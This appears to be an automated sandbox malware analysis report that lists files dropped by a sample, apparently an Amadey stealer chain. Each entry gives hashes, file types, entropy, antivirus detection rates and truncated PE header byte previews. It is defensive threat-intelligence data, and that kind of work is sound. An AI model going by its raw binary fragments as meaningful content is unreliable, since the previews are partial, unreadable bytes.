                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k...k...k.......k......hk.......k.......k......k......k.....k.......k...k..|k.......k.......k..Rich.k..................PE..L....G.f.....................R......K.............@..........................@............@.................................4....................................)......8..............................@............................................text.............................. ..`.rdata..............................@..@.data...."..........................@....reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):2806784
                                                        Entropy (8bit):7.244220095628573
                                                        Encrypted:false
                                                        SSDEEP:49152:ZI/0Xh92X3FAOkoQgcK1UeVBOHpwIf0bOtW1sLjS8gumDJKm:6O2X33Dcp98bObLBCJv
                                                        MD5:3AACE51D76B16A60E94636150BD1137E
                                                        SHA1:F6F1E069DF72735CB940058DDFB7144166F8489B
                                                        SHA-256:B51004463E8CDFE74C593F1D3E883FF20D53AD6081DE7BF46BB3837B86975955
                                                        SHA-512:95FB1F22ED9454911BFCA8ADA4C8D0A6CF402DE3324B133E1C70AFAA272A5B5A54302A0D1EB221999DA9343BA90B3CAC0B2DAECF1879D0B9B40857330A0D0F4E
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...dm.Kdm.Kdm.K..Jmm.K..Jhm.K..JJm.Km.*Kjm.K/..Jmm.Kdm.K.m.K...Jom.K...J m.Kdm.Kem.Kw.Jem.Kw.FKem.Kw.Jem.K................PE..d...>..f.........."....(.........V..8..........@.............................@2...........`..........................................X'.X....Y'.......)..n...p(..A...........02.D...P[$.T....................]$.(....Z$.@............p.. ............................text............................... ..`.managed.....0...................... ..`hydrated.T...............................rdata.......p......................@..@.data...`.....'..".... .............@....pdata...A...p(..B....!.............@..@.rsrc....n....)..p...\".............@..@.reloc..D....02.......*.............@..B................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1922048
                                                        Entropy (8bit):7.947878161099179
                                                        Encrypted:false
                                                        SSDEEP:49152:SwvORV3tMQBGYpgVFATxREShnzKTEpaxAU1C+ncNY3:SltDsOgbATxRpOApiA8vh
                                                        MD5:566728AF17C4D70FE4649EE22A80F9DD
                                                        SHA1:F998138CEC60416B9F9A655F39B28C577EE8A126
                                                        SHA-256:B23BFB6C78F2608D465E2EECDE76CEB1F6211A7996547D7D6B89C8CE768A71C7
                                                        SHA-512:8D2AAAAA4DF5C7E8A89076A246AE19DCD5C8F48FF0386254370170748CE7BECD98563409F4011C6E172373515939F93FD812F0B619139E4EF8D0ABFFBBC51400
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................K...........@...........................L.....\.....@.................................W...k.............................K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...prspuaeb.@....1..8..................@...plcvpmpk......K......,..............@....taggant.0....K.."...2..............@...........................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):327168
                                                        Entropy (8bit):6.641160964790137
                                                        Encrypted:false
                                                        SSDEEP:6144:nx9ooeWfqpO3HS0f+KIXDyqR9NKtU5tyt7EJtdb/yw0cV3IOfe52GGZ2OGe+CKip:nx9onKM2+KIXrLGw0ci22OGe+CKiV9pz
                                                        MD5:0EC1F7CC17B6402CD2DF150E0E5E92CA
                                                        SHA1:8405B9BF28ACCB6F1907FBE28D2536DA4FBA9FC9
                                                        SHA-256:4C5CA5701285337A96298EBF994F8BA013D290C63AFA65B5C2B05771FBBB9ED4
                                                        SHA-512:7CAA2416BC7878493B62A184DDC844D201A9AB5282ABFA77A616316AF39FF65309E37BB566B3E29D9E764E08F4EDA43A06464ACAF9962F911B33E6DBC60C1861
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k...k...k.......k......hk.......k.......k......k......k.....k.......k...k..|k.......k.......k..Rich.k..................PE..L....G.f.....................R......K.............@..........................@............@.................................4....................................)......8..............................@............................................text.............................. ..`.rdata..............................@..@.data...."..........................@....reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):492544
                                                        Entropy (8bit):6.391116117275591
                                                        Encrypted:false
                                                        SSDEEP:12288:UHdftnB3Zp+52J9+62HHLhJ3er8XSwW0:UNz3ZwwJ9+7HFnXP
                                                        MD5:F9A4F6684D1BF48406A42921AEBC1596
                                                        SHA1:C9186FF53DE4724EDE20C6485136B4B2072BB6A6
                                                        SHA-256:E0A051F93D4C1E81CC142181D14249E246BE4C169645D667267134B664E75042
                                                        SHA-512:67294A47DFEF6ABA404939497C403F93318841E9C5EE28B706F7506B5DFF2630381E28E86F6DCBFDFF2427092A515DB1DC0A04E334E7F8DE8B0B682269FF88FD
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+..J...J...J...<...J...<#..J...<...J...2...J...J...J...<...J...<'..J...< ..J..Rich.J..................PE..L.....jd.....................NA......K............@...........................F.....i"..........................................d.....D.H...........................p....................... 7.......6..@............................................text............................... ..`.data.....?......|..................@....rsrc...H.....D......n..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):104448
                                                        Entropy (8bit):4.851224245014386
                                                        Encrypted:false
                                                        SSDEEP:3072:pbqQQQQQQQQkQQQQQQQQQQQQQQ+QQQjQQQQQQQQQQQQQQxQQQQQQQQQjQQQQQQQ3:5qQQQQQQQQkQQQQQQQQQQQQQQ+QQQjQ+
                                                        MD5:771B8E84BA4F0215298D9DADFE5A10BF
                                                        SHA1:0F5E4C440CD2E7B7D97723424BA9C56339036151
                                                        SHA-256:3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0
                                                        SHA-512:2814EF23653C9BE5F5E7245AF291CF330C355ED12B4DB76F71B4DE699C67A9FFD1BDC0CC1DF5352335B57AB920404B9C8E81CD9257527264BDE4F72A53700164
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q................0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......Ph..lD..........................................................C........s..Q....sECbF.h..o....e?.+.x.28+.{u.)..y....-i.$.n. y....R`..}...........ds.g..0._e#....&...K......._..|l.d.z..........6..>...M...!.a*..c.k.......%.......1..o.........F.b.."............cz...)..cg.-@.w.....4.*.M4...@8....M..dO..|z..Zca...69.......................................................................CC.........6....6....................................................8..8.
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):2846145
                                                        Entropy (8bit):6.162330655717327
                                                        Encrypted:false
                                                        SSDEEP:49152:kpiVaJ9m+8FdK1BZKVD2CMwbbIip7q18N/jH1:ks3+11vKV7Fs89jH1
                                                        MD5:FD2DEFC436FC7960D6501A01C91D893E
                                                        SHA1:5FAA092857C3C892EAB49E7C0E5AC12D50BCE506
                                                        SHA-256:BA13DA01C41FA50EC5E340061973BC912B1F41CD1F96A7CAE5D40AFC00FF7945
                                                        SHA-512:9A3E1F2DC5104D8636DC27AF4C0F46BDB153FCFADA98831B5AF95EEB09BB7EF3C7E19927D8F06884A6837E10889380645B6138644F0C08B9CB2E59453041EC42
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...NF.f..$."&.........#.....B ..x`...............@...................................,....... .........................B.......................................`5..........................dX.......................................................text...............................`.P`.data...............................@.`..rdata..X...........................@.`@/4......8....p.......L..............@.0@.bss.....w`..0........................`..edata..B...........................@.0@.idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..`5.......6..................@.0B/14.....p....0.......H .............@..B/29..........@.......P .............@..B/41......K.......L....!.............@..B/55..........@.......B".............@..B/67..... ....0.......&#.............@.0B/80.....Q....P.......D#.
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):2806784
                                                        Entropy (8bit):7.244220095628573
                                                        Encrypted:false
                                                        SSDEEP:49152:ZI/0Xh92X3FAOkoQgcK1UeVBOHpwIf0bOtW1sLjS8gumDJKm:6O2X33Dcp98bObLBCJv
                                                        MD5:3AACE51D76B16A60E94636150BD1137E
                                                        SHA1:F6F1E069DF72735CB940058DDFB7144166F8489B
                                                        SHA-256:B51004463E8CDFE74C593F1D3E883FF20D53AD6081DE7BF46BB3837B86975955
                                                        SHA-512:95FB1F22ED9454911BFCA8ADA4C8D0A6CF402DE3324B133E1C70AFAA272A5B5A54302A0D1EB221999DA9343BA90B3CAC0B2DAECF1879D0B9B40857330A0D0F4E
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...dm.Kdm.Kdm.K..Jmm.K..Jhm.K..JJm.Km.*Kjm.K/..Jmm.Kdm.K.m.K...Jom.K...J m.Kdm.Kem.Kw.Jem.Kw.FKem.Kw.Jem.K................PE..d...>..f.........."....(.........V..8..........@.............................@2...........`..........................................X'.X....Y'.......)..n...p(..A...........02.D...P[$.T....................]$.(....Z$.@............p.. ............................text............................... ..`.managed.....0...................... ..`hydrated.T...............................rdata.......p......................@..@.data...`.....'..".... .............@....pdata...A...p(..B....!.............@..@.rsrc....n....)..p...\".............@..@.reloc..D....02.......*.............@..B................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):330792
                                                        Entropy (8bit):7.984907013196583
                                                        Encrypted:false
                                                        SSDEEP:6144:kImw3mswWc3KcEUffTOR/PmB7ZegrbgykDDCT2qDx0j6ibCMvUkBEO:k+wWcXbwmfXK62qSjPbkkBEO
                                                        MD5:D6FCA3CD57293390CCF9D2BC83662DDA
                                                        SHA1:94496D01AA91E981846299EEAC5631AB8B8C4A93
                                                        SHA-256:74E0BF30C9107FA716920C878521037DB3CA4EEDA5C14D745A2459EB14D1190E
                                                        SHA-512:3990A61000C7DAD33E75CE1CA670F5A7B66C0CE1215997DCCFCA5D4163FEDFC7B736BCA01C2F1064B0C780ECCB039DD0DE6BE001C87399C1D69DA0F456DB2A8E
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................@............`.....................................S.......................(&... ......p................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.........................................................................#...t..j. `t-...z.....-....r.N..e.k..MXw..a.bj......#.O...1..$....OU.........]AM...K!].,..Z........w...R...^#.U..(.Q.D}z......m..._.. ".!..z.#.79...y.Y.2......lc...5..>.l...[..W.I.C......9...FkJ..}.X_X.*"...qP.4...p.X"..d6.&....\...a...]".Tv>.@..GIc.4...P....J..zj.pr.y.r.*.fH...6.......#.....kqzT+.S....0.A..p.1.....f..|.P.#.XX..m......+p.:.+...q.....#X...},nh.L.N.'.,..0|:.r.E.3..%Y..u
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1104936
                                                        Entropy (8bit):7.998181628509962
                                                        Encrypted:true
                                                        SSDEEP:24576:lxaesWtTVxFP96Hu0jjjfQNggJRhc2BIVTit:3FsWTzqjjW/BV
                                                        MD5:8E74497AFF3B9D2DDB7E7F819DFC69BA
                                                        SHA1:1D18154C206083EAD2D30995CE2847CBEB6CDBC1
                                                        SHA-256:D8E81D9E336EF37A37CAE212E72B6F4EF915DB4B0F2A8DF73EB584BD25F21E66
                                                        SHA-512:9AACC5C130290A72F1087DAA9E79984565CCAB6DBCAD5114BFED0919812B9BA5F8DEE9C37D230EECA4DF3CCA47BA0B355FBF49353E53F10F0EBC266E93F49F97
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f................................. ........@.. ....................... ............`.....................................O.......................(&........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........................................................................L.v.lT.p#.E..'&..@cC...tE.....% ...pr*QA.U.v6..V.=.Cx..G.H.E.....i.....(hh.q.Bf..}...gL-.S.1),p.....$.8.ij3.....7....!Ts......T.[...X..PUE.c.j...s.].E........q.X.wsS.Y....g)......7I...OK..m(..d.(.T........0`.V`...o....E.G...#.I..q.....lh9..+........>6Q..=.S ...........-....#..].......rA.R..........1?.[..}l....jqD.$....N..xE1p....x[.h~.....i..d...u.!x.o..D..yue...S../z..>.|.!. .0.^.
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):425984
                                                        Entropy (8bit):6.513416731775012
                                                        Encrypted:false
                                                        SSDEEP:12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
                                                        MD5:F5D7B79EE6B6DA6B50E536030BCC3B59
                                                        SHA1:751B555A8EEDE96D55395290F60ADC43B28BA5E2
                                                        SHA-256:2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
                                                        SHA-512:532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 87%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1922048
                                                        Entropy (8bit):7.947878161099179
                                                        Encrypted:false
                                                        SSDEEP:49152:SwvORV3tMQBGYpgVFATxREShnzKTEpaxAU1C+ncNY3:SltDsOgbATxRpOApiA8vh
                                                        MD5:566728AF17C4D70FE4649EE22A80F9DD
                                                        SHA1:F998138CEC60416B9F9A655F39B28C577EE8A126
                                                        SHA-256:B23BFB6C78F2608D465E2EECDE76CEB1F6211A7996547D7D6B89C8CE768A71C7
                                                        SHA-512:8D2AAAAA4DF5C7E8A89076A246AE19DCD5C8F48FF0386254370170748CE7BECD98563409F4011C6E172373515939F93FD812F0B619139E4EF8D0ABFFBBC51400
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................K...........@...........................L.....\.....@.................................W...k.............................K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...prspuaeb.@....1..8..................@...plcvpmpk......K......,..............@....taggant.0....K.."...2..............@...........................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6646953
                                                        Entropy (8bit):6.633823221893971
                                                        Encrypted:false
                                                        SSDEEP:49152:P2OI2oMyZ4NG02ebe3l7i0s1Nc9blH6xzR1CcLPGj8kiaWOJfuYuCvAHZ+WcfZgJ:jJbiHlHOR1CcLPGj8kiaW98XqVyWPt
                                                        MD5:F4C78D18C5B5CB531C897F23CF3D3FED
                                                        SHA1:5C0F3D158F3A4DE86AB0C811CDD945236AFD4740
                                                        SHA-256:4553D0B891772C5170F9E840AE21F514C50C92636462A1BC785E536857456321
                                                        SHA-512:705A256CE81E6F9C62CD8D3230492FA46BA70F829A0480794CC968C2B53E5EA940482D9E710DCF4B7AB3D1E8281995E6FBA9D309F60FF01689A85E2324E7D995
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f..^.)&.........#..G..PZ...f...........G...@.................................Y.f....... ......................0..B....@...............................p..D$..........................dzH......................A...............................text....G.......G.................`.P`.data.........G.......G.............@.`..rdata..x.....G.......G.............@.`@/4............H......tH.............@.0@.bss......f..@L.......................`..edata..B....0....... L.............@.0@.idata.......@......."L.............@.0..CRT....4....P.......,L.............@.0..tls.........`........L.............@.0..reloc..D$...p...&...0L.............@.0B/14..................VZ.............@..B/29.................^Z.............@..B/41.....XL...`...N....\.............@..B/55.....B............T\.............@..B/67.....T............8].............@.0B/80.....a............V].
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Category:dropped
                                                        Size (bytes):1414800
                                                        Entropy (8bit):7.827189910944366
                                                        Encrypted:false
                                                        SSDEEP:24576:UzZ1Futzu9df939+wlQ+u6M6NrPLyPts+5+OgoSsKWF5DcJ14lWCqMYDe1EpmqIu:UvF4a9d9tnlQ+u96NyPtP5+1GKWF5gzn
                                                        MD5:DB2A12EDC73769F2F2B6B01545AFE2C3
                                                        SHA1:73DC44FB0753296F51B851299F468031CEB77B54
                                                        SHA-256:E6DB7D34B498982601B2C45AC5B2A1C1B9502E502514CCFFAE9862F2AA719F42
                                                        SHA-512:DADF36BC9C5D88C28B9064892CC263C912CE668435B71802DF756C0A4E680F8407011D36498A2511DDA7165AEA866C0AE794F9EC8FBCC42C7DA1661399316CE4
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 39%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.ydx..7x..7x..7_Hz7{..7_Hl7i..7x..7..7q..7s..7q..7y..7q..7y..7Richx..7........................PE..L....l.K.................h...@...B...4............@..................................................................................................................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata...................................rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6663286
                                                        Entropy (8bit):6.633833679677087
                                                        Encrypted:false
                                                        SSDEEP:98304:LMx3VZorofxDRAwXHf39g5MrvketaC+sbUefI:iFISthXf9gKrr1pfI
                                                        MD5:F9E43AEFFF1576AA7ADFC1688D5A24BF
                                                        SHA1:9ACBCA30ABA919B26F1439668EBDB1B6A38E46EA
                                                        SHA-256:B1FCE873959EE7296C5D7307FC3E4302BC013C8DDCE57EE77708A94E4416653A
                                                        SHA-512:69D35C334B4670BDA9E6045738CD6779E16EC2C712CC98FD2FA595829A7D78F62739C59EFACA61D4BC190F0A60D722A283F2046276338125D70545D679EE1532
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.2_.S&.........#..G...Z...f...........G...@...................................f....... ......................`..B....p..................................$.............................H......................q...............................text.....G.......G.................`.P`.data.........G.......G.............@.`..rdata........H.......G.............@.`@/4......<.....H.......H.............@.0@.bss....T.f..pL.......................`..edata..B....`.......JL.............@.0@.idata.......p.......LL.............@.0..CRT....4............VL.............@.0..tls.................XL.............@.0..reloc..$........0...ZL.............@.0B/14...................Z.............@..B/29..................Z.............@..B/41.....XL.......N...:\.............@..B/55.....B.............\.............@..B/67.....T............l].............@.0B/80.....a.............].
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                        Category:dropped
                                                        Size (bytes):116504
                                                        Entropy (8bit):7.889097865963665
                                                        Encrypted:false
                                                        SSDEEP:3072:/H5qo9O62rG3ptE+FJPvghWGakrkU75TW+ZpASmp9:QrSnEiNn8t7x35M
                                                        MD5:761FCAD5DBF636BF6B6E439E0203443F
                                                        SHA1:288129BCB5109173EF496214BD28D234F9DD9754
                                                        SHA-256:0C129566502975AA34EBB4C7BD3003A9A82F1D668B065FF61A52E393442D132A
                                                        SHA-512:F35F6B6A6AD91B2B0F423F8A52C19D21FA2EAA0DD4E630A8089305CCF3C377E487A219AFD9F5175F00147AE060393C42EA2F474A504E52748C573761A7D7E592
                                                        Malicious:false
                                                        Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-w....h.\_.... o1...Ob=Mr..K..6......X...]..p4W...........y?..?........<..Uy..t.......W.....u...gm&.f....
                                                        Process:C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):327168
                                                        Entropy (8bit):6.641160964790137
                                                        Encrypted:false
                                                        SSDEEP:6144:nx9ooeWfqpO3HS0f+KIXDyqR9NKtU5tyt7EJtdb/yw0cV3IOfe52GGZ2OGe+CKip:nx9onKM2+KIXrLGw0ci22OGe+CKiV9pz
                                                        MD5:0EC1F7CC17B6402CD2DF150E0E5E92CA
                                                        SHA1:8405B9BF28ACCB6F1907FBE28D2536DA4FBA9FC9
                                                        SHA-256:4C5CA5701285337A96298EBF994F8BA013D290C63AFA65B5C2B05771FBBB9ED4
                                                        SHA-512:7CAA2416BC7878493B62A184DDC844D201A9AB5282ABFA77A616316AF39FF65309E37BB566B3E29D9E764E08F4EDA43A06464ACAF9962F911B33E6DBC60C1861
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k...k...k.......k......hk.......k.......k......k......k.....k.......k...k..|k.......k.......k..Rich.k..................PE..L....G.f.....................R......K.............@..........................@............@.................................4....................................)......8..............................@............................................text.............................. ..`.rdata..............................@..@.data...."..........................@....reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):792152
                                                        Entropy (8bit):7.999752041562741
                                                        Encrypted:true
                                                        SSDEEP:12288:S2txcY4Gu0kDVO9n0NZEncdRSu0QqcbI0pLZ3h3r6MorbtDTb85w491BIvgvW6E:f/Tu/4kuu0QqcbxZh3ribh05w4zwgvRE
                                                        MD5:6A22704AE494645CA19955DE0CB879BC
                                                        SHA1:ACC40B89422C32563656441519DF5D2199772398
                                                        SHA-256:F4E8BEB419142C0B8152CD8028B95A877B938A1F400C610DEE9E4139484385D6
                                                        SHA-512:3852D5E7D29BE2B89008C9A970D4770A5D4599D6F75B4927FB56CA12FDC7BA5DB0D2A6425786EC71A57A86342FCFC669E6CFB724683922FEB5175DD369A5D687
                                                        Malicious:true
                                                        Preview:K..J...vz..I`..i....D..t.....k7...W.9..r.a.z.\......_..........v.w.Y........'|.....$..*.!}.E..er.I.F.#5UA...B7S!u\../R.iU@.TsF.....WJ_6.Kd.f.B}.)t.K*qBG0..?.....?&9;...%..o.x..*.v.P.&+n.5j..^..D.-..%@.w.}..}..?..q.../.>G.S..~..a..U.O...yJ..b..E.%X...../P).....UN".,&..j..%4....o.........zZ.......y,..? ..+.!5S......Q. ..n;........Zw..l...`..r'?..|.'..Y.J...k..B.zW..no..Rk."....|.!..N..X h....Gn...A...FRA.\M..@... 1d....N.G.....EPq......i...yX..-&=.........m......G......U.......Qp...WC .0...L..h.q.....k.{.R.....l.*_oLL..p[....QL5..}.%K.F....K...#$Q,..n.=..\b.3.u:#p..g.ju...,~-'.n..F=...N.%....@/...K.L..r..]S./;.....oQ..a.......-s.`.gB..A....R.SJ...bO<..&|_..VZ...d(>.2..P.f. <z....H$...Nd(....!\...R.f...[#..Z{e..@j...G.c1...]MX..?..I.:...@.3I&......E..k.5.....E.t;....0.O..\/.L-c....R..|...jE!....z,.....kM..m.8.!.......j......iS.q.<...CB;].wY2...4Q3.2.-....]:ih....'..c..V..ht.... >?I. .J...C].l...8F..r{S.'..N).P.s.>.......b....Y.6G.P#........
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:modified
                                                        Size (bytes):893608
                                                        Entropy (8bit):6.62028134425878
                                                        Encrypted:false
                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):87040
                                                        Entropy (8bit):7.998110498540301
                                                        Encrypted:true
                                                        SSDEEP:1536:2fV6ysLAsot6A5to2ocZ/3QRI6ySIBORLPcV+MJCP7Jay/R0ulyd0g31RQhc:2wycAsa5jvQRIwV9P3MJCToqLycG
                                                        MD5:D79DDDA7E49B51BB69F59808170A5E63
                                                        SHA1:B791857AE7B920D50F2FC97F0895F289C6A9E8BD
